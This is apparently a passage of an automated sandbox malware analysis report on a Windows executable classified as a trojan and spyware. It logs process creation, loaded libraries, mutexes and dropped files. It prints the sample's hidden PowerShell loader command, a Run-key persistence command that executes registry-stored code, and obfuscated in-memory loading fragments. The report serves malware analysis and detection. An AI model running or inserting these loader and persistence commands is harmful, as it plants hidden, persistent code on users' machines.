      Source: C:\Users\user\Desktop\x295IO8kqM.exeCode function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040326A
      Source: C:\Users\user\Desktop\x295IO8kqM.exeCode function: 0_2_004066E20_2_004066E2
      Source: C:\Users\user\Desktop\x295IO8kqM.exeCode function: 0_2_00404AF50_2_00404AF5
      Source: x295IO8kqM.exeStatic PE information: invalid certificate
      Source: x295IO8kqM.exe, 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamechartrooms fremtoningsprg.exen' vs x295IO8kqM.exe
      Source: x295IO8kqM.exeBinary or memory string: OriginalFilenamechartrooms fremtoningsprg.exen' vs x295IO8kqM.exe
      Source: x295IO8kqM.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)"
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/17@5/5
      Source: C:\Users\user\Desktop\x295IO8kqM.exeCode function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040326A
      Source: C:\Users\user\Desktop\x295IO8kqM.exeCode function: 0_2_00404579 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404579
      Source: C:\Users\user\Desktop\x295IO8kqM.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
      Source: C:\Users\user\Desktop\x295IO8kqM.exeFile created: C:\Program Files (x86)\Common Files\NonskeletallyJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeFile created: C:\Users\user\AppData\Roaming\woadyJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1000:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1000:120:WilError_03
      Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\alsmdjtru-Z27L4O
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_03
      Source: C:\Users\user\Desktop\x295IO8kqM.exeFile created: C:\Users\user\AppData\Local\Temp\nsh35B9.tmpJump to behavior
      Source: x295IO8kqM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\x295IO8kqM.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: x295IO8kqM.exeReversingLabs: Detection: 39%
      Source: C:\Users\user\Desktop\x295IO8kqM.exeFile read: C:\Users\user\Desktop\x295IO8kqM.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\x295IO8kqM.exe "C:\Users\user\Desktop\x295IO8kqM.exe"
      Source: C:\Users\user\Desktop\x295IO8kqM.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Declarative.Udt' ; $Diodens=$Coriin.SubString(73160,3);.$Diodens($Coriin)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)"
      Source: C:\Users\user\Desktop\x295IO8kqM.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Declarative.Udt' ; $Diodens=$Coriin.SubString(73160,3);.$Diodens($Coriin) Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)"Jump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: x295IO8kqM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Data Obfuscation

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Lovinitiativer $Ortolan $standerwort), (Cellar @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Axone = [AppDomain]::CurrentDomain.GetAssemblies()$global:Pj
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Drysning)), $gteskabskontoret).DefineDynamicModule($Straamndenes, $false).DefineType($Rehumanises, $Stomatomycosis, [System.MulticastD
      Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FeriesJump to behavior
      Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FeriesJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\x295IO8kqM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
